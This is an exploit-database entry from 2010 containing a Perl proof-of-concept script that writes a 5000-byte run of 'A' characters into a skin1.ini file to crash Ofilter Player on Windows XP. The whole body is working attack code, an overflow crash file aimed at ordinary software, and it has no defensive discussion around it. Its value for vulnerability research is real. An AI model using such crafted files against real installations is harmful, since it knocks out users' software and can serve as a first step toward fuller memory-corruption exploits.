id: 10074
date: 01/13/2010
title: Ofilter Player (skin.ini) Local Crash PoC
author: Rehan Ahmed
cves: 

=========================================
Ofilter Player (skin.ini) Local Crash PoC
=========================================

#!/usr/bin/perl
#Exploit Title: Ofilter Player (skin.ini) Local Crash PoC
#Author:Vulnerability Discovered By Rehan Ahmed (rehan@rewterz.com)
#Tested On: WinXP SP2
 
my $boom="\x41" x 5000;
my $file="skin1.ini"; #C:\Program Files\OfilterPlayer\skin
open($FILE,">$file");
print $FILE $boom;
close($FILE);
print "File Successfully Created\n";



#  0day.today [2023-03-22]  #